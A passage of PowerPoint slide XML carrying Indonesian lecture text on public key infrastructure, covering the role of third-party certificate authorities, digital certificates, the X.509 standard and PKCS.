            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Comodo, DigiCert, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>GeoTrust</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>IdenTrust</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan Let's Encrypt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilayani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh CA.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keabsahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengajukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permohonan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendaftaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Membangun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepercayaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemerintah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otoritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengatur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lembaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keuangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>repositori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siklus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hidup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terutama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencabut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> valid.</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42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2115142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Sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Digital</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> digital pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasarnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembungkus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>subjek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>halnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>subjek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerbit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditandatangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> digital </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuktikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikeluarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>subjek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh CA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Subjek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berupa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manusia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengizinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penandatanganan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server web yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghosting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transaksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> digital </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> X.509 yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disetujui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh International Telecommunications Union dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>distandardisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh Internet Engineering Task Force (tools.ietf.org/html/rfc5280). RSA juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menciptakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Public Key Cryptography Standards (PKCS), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempromosikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>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43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20945702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Akar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kepercayaan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Model root of trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendefinisikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagaimana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan CA yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
